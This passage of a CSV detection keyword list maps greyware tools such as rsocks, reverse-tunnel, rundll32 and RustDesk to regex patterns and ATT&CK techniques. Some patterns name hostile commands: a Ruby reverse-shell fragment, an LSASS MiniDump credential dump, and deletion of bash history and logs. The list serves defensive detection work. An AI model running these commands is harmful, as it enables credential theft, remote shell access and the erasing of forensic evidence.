"*e6c9ef3c9ee804ca3bed5f13f5e179f9ef16b7b2513cdfc33974902faa0f7516*",".{0,1000}e6c9ef3c9ee804ca3bed5f13f5e179f9ef16b7b2513cdfc33974902faa0f7516.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*e717e4a46f338480838e760a05b7a628ccca57b0d4d705a67359bf9481fa58ae*",".{0,1000}e717e4a46f338480838e760a05b7a628ccca57b0d4d705a67359bf9481fa58ae.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*ef77dea20926b6f460844b5a51fd0d238976a1dba89f20f0fccff96712ad9df8*",".{0,1000}ef77dea20926b6f460844b5a51fd0d238976a1dba89f20f0fccff96712ad9df8.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*f865ac0b99a90f54ce67bbabb2e57226a5c61f58e7a867598a3d54fdfee895ee*",".{0,1000}f865ac0b99a90f54ce67bbabb2e57226a5c61f58e7a867598a3d54fdfee895ee.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*f99a0080be86f97331ea300f2a4f448097c5ae39100b15202c89fc91024b215e*",".{0,1000}f99a0080be86f97331ea300f2a4f448097c5ae39100b15202c89fc91024b215e.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","#filehash","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*snsinfu/reverse-tunnel*",".{0,1000}snsinfu\/reverse\-tunnel.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","1","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*Tunneling remote connection from * to *",".{0,1000}Tunneling\sremote\sconnection\sfrom\s.{0,1000}\sto\s.{0,1000}","greyware_tool_keyword","reverse-tunnel","rtun is a tool for exposing TCP and UDP ports to the Internet via a public gateway server. 
You can expose ssh and mosh server on a machine behind firewall and NAT.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/snsinfu/reverse-tunnel","1","0","N/A","N/A","10","10","170","36","2023-10-15T07:29:32Z","2018-07-09T21:41:50Z" "*rm $HISTFILE*",".{0,1000}rm\s\$HISTFILE.{0,1000}","greyware_tool_keyword","rm","deleting bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*rm .bash_history*",".{0,1000}rm\s\.bash_history.{0,1000}","greyware_tool_keyword","rm","deleting bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*rm /var/log/*.log*",".{0,1000}rm\s\/var\/log\/.{0,1000}\.log.{0,1000}","greyware_tool_keyword","rm","deleting log files","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*rm ~/.bash_history*",".{0,1000}rm\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","rm","deleting bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*rm -rf .bash_history*",".{0,1000}rm\s\-rf\s\.bash_history.{0,1000}","greyware_tool_keyword","rm","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*rm -rf ~/.bash_history*",".{0,1000}rm\s\-rf\s\~\/\.bash_history.{0,1000}","greyware_tool_keyword","rm","delete bash history","T1070.006","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*rd /s /q 
%systemdrive%\$RECYCLE.BIN*",".{0,1000}rd\s\/s\s\/q\s\%systemdrive\%\\\$RECYCLE\.BIN.{0,1000}","greyware_tool_keyword","rmdir ","removes files from the Recycle Bin - erasing forensic evidence","T1070.003","TA0005","N/A","N/A","Defense Evasion","https://github.com/roadwy/DefenderYara/blob/9bbdb7f9fd3513ce30aa69cd1d88830e3cf596ca/Ransom/MSIL/Hakbit/Ransom_MSIL_Hakbit_PA_MTB.yar#L7","1","0","N/A","N/A","10","10","196","46","2024-07-09T12:37:18Z","2024-02-05T13:57:05Z" "*rmmod -r*",".{0,1000}rmmod\s\-r.{0,1000}","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","7","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*rmmod --remove*",".{0,1000}rmmod\s\-\-remove.{0,1000}","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","7","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*sudo rmmod -r*",".{0,1000}sudo\srmmod\s\-r.{0,1000}","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. 
This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","N/A","greyware tool - risks of False positive !","7","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "rpcclient -*","rpcclient\s\-.{0,1000}","greyware_tool_keyword","rpcclient","tool for executing client side MS-RPC functions","T1021.006 - T1049","TA0002 - TA0009","N/A","N/A","Lateral Movement","https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","1","0","N/A","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" "* rsocks.pool*",".{0,1000}\srsocks\.pool.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "* rsocks.server*",".{0,1000}\srsocks\.server.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*.rsocks.plist*",".{0,1000}\.rsocks\.plist.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*/bin/rsocks*",".{0,1000}\/bin\/rsocks.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered 
Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*/com.tonyseek.rsocks.plist*",".{0,1000}\/com\.tonyseek\.rsocks\.plist.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*/opt/rsocks/*",".{0,1000}\/opt\/rsocks\/.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*/rsocks.git*",".{0,1000}\/rsocks\.git.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","1","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z" "*/rsocks.git*",".{0,1000}\/rsocks\.git.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*/rsocks.toml*",".{0,1000}\/rsocks\.toml.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*/rsocks/releases/download/*",".{0,1000}\/rsocks\/releases\/download\/.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - 
T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","1","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z" "*/rsocks_linux_amd64*",".{0,1000}\/rsocks_linux_amd64.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","1","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z" "*/rsocks_windows_386.exe*",".{0,1000}\/rsocks_windows_386\.exe.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","1","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z" "*\rsocks_windows_386.exe*",".{0,1000}\\rsocks_windows_386\.exe.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","0","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z" "*14586f0477d31640096bf4749480b78c6a6c3afde3527bcc64e9d5f70d9e93ac*",".{0,1000}14586f0477d31640096bf4749480b78c6a6c3afde3527bcc64e9d5f70d9e93ac.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","#filehash","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*242194dbbdaca6aa7382e0b9f9677a2e7966bc6db8934119aa096e38a9fbf86d*",".{0,1000}242194dbbdaca6aa7382e0b9f9677a2e7966bc6db8934119aa096e38a9fbf86d.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered 
Spider*","C2","https://github.com/brimstone/rsocks","1","0","#filehash","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z" "*4a97ad649c31411528694fdd8751bc6521f535f57022e6a6c0a39988df20d7b0*",".{0,1000}4a97ad649c31411528694fdd8751bc6521f535f57022e6a6c0a39988df20d7b0.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","0","#filehash","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z" "*51a5737c2b51190507d47557023264299f8de0b2152e89e093e0e61f64807986*",".{0,1000}51a5737c2b51190507d47557023264299f8de0b2152e89e093e0e61f64807986.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","0","#filehash","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z" "*a539e169941f55d687ca44c90a5a90715dd23871a04a64f1712e08e758df0ec0*",".{0,1000}a539e169941f55d687ca44c90a5a90715dd23871a04a64f1712e08e758df0ec0.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","0","#filehash","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z" "*a9a87bdcf06a8b5ee41a1eec95c0f9c813a5f29ba6d8eec28b07d8331aa5eb85*",".{0,1000}a9a87bdcf06a8b5ee41a1eec95c0f9c813a5f29ba6d8eec28b07d8331aa5eb85.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","#filehash","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" 
"*brimstone/rsocks*",".{0,1000}brimstone\/rsocks.{0,1000}","greyware_tool_keyword","rsocks","reverse socks5 client & server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/brimstone/rsocks","1","1","N/A","N/A","10","10","82","30","2020-01-09T20:45:32Z","2018-01-05T03:09:07Z" "*easy_install rsocks*",".{0,1000}easy_install\srsocks.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*import socket, socks, listen, serve, wrap_ssl, GreenPool*",".{0,1000}import\ssocket,\ssocks,\slisten,\sserve,\swrap_ssl,\sGreenPool.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*pip install rsocks*",".{0,1000}pip\sinstall\srsocks.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*pip install -U rsocks*",".{0,1000}pip\sinstall\s\-U\srsocks.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*rsocks --config*",".{0,1000}rsocks\s\-\-config.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - 
TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*rsocks/server.py*",".{0,1000}rsocks\/server\.py.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","1","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*rsocks\server.py*",".{0,1000}rsocks\\server\.py.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","0","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*tonyseek/rsocks*",".{0,1000}tonyseek\/rsocks.{0,1000}","greyware_tool_keyword","rsocks","A SOCKS 4/5 reverse proxy server","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider*","C2","https://github.com/tonyseek/rsocks","1","1","N/A","N/A","10","10","131","13","2022-09-20T07:11:29Z","2015-03-08T22:31:31Z" "*rsync -r * *@*:*",".{0,1000}rsync\s\-r\s.{0,1000}\s.{0,1000}\@.{0,1000}\:.{0,1000}","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*rsync -r *@*:* *",".{0,1000}rsync\s\-r\s.{0,1000}\@.{0,1000}\:.{0,1000}\s.{0,1000}","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" 
"*ruby -rsocket *TCPSocket.open(*exec sprintf*/bin/sh -i *",".{0,1000}ruby\s\-rsocket\s.{0,1000}TCPSocket\.open\(.{0,1000}exec\ssprintf.{0,1000}\/bin\/sh\s\-i\s.{0,1000}","greyware_tool_keyword","ruby","ruby reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*lsass*rundll32.exe *comsvcs.dll, MiniDump *.dmp full*",".{0,1000}lsass.{0,1000}rundll32\.exe\s.{0,1000}comsvcs\.dll,\sMiniDump\s.{0,1000}\.dmp\sfull.{0,1000}","greyware_tool_keyword","rundll32","dumping lsass","T1003 - T1055.011 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","N/A","1","0","N/A","observed in exploitations by mthcht","10","10","N/A","N/A","N/A","N/A" "*rundll32*.dll*a*/p:*",".{0,1000}rundll32.{0,1000}\.dll.{0,1000}a.{0,1000}\/p\:.{0,1000}","greyware_tool_keyword","rundll32","Detects the use of getsystem Meterpreter/Cobalt Strike command. 
Getsystem is used to elevate privilege to SYSTEM account.","T1055.002 - T1078.002 - T1134.001 - T1134.002","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z" "*rundll32*.dll*StartW*",".{0,1000}rundll32.{0,1000}\.dll.{0,1000}StartW.{0,1000}","greyware_tool_keyword","rundll32","Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line.","T1218.005 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1268","190","2022-07-14T07:15:10Z","2021-01-01T16:44:42Z" "* RustDesk.exe*",".{0,1000}\sRustDesk\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "* start rustdesk://*",".{0,1000}\sstart\srustdesk\:\/\/.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*/home/user/rustdesk*",".{0,1000}\/home\/user\/rustdesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - 
TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*/RustDesk.exe*",".{0,1000}\/RustDesk\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*/rustdesk.git*",".{0,1000}\/rustdesk\.git.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*/rustdesk/rustdesk/releases/*",".{0,1000}\/rustdesk\/rustdesk\/releases\/.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\.rustdesk*",".{0,1000}\\\.rustdesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" 
"*\\RustDeskIddDriver*",".{0,1000}\\\\RustDeskIddDriver.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\AppData\Local\rustdesk\*",".{0,1000}\\AppData\\Local\\rustdesk\\.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\config\RustDesk.toml*",".{0,1000}\\config\\RustDesk\.toml.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\config\RustDesk_local.*",".{0,1000}\\config\\RustDesk_local\..{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\CurrentVersion\Uninstall\RustDesk*",".{0,1000}\\CurrentVersion\\Uninstall\\RustDesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 
- T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\librustdesk.dll*",".{0,1000}\\librustdesk\.dll.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\ProgramData\RustDesk\*",".{0,1000}\\ProgramData\\RustDesk\\.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\rustdesk-*-x86_64.exe*",".{0,1000}\\rustdesk\-.{0,1000}\-x86_64\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z" "*\RustDesk.exe*",".{0,1000}\\RustDesk\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 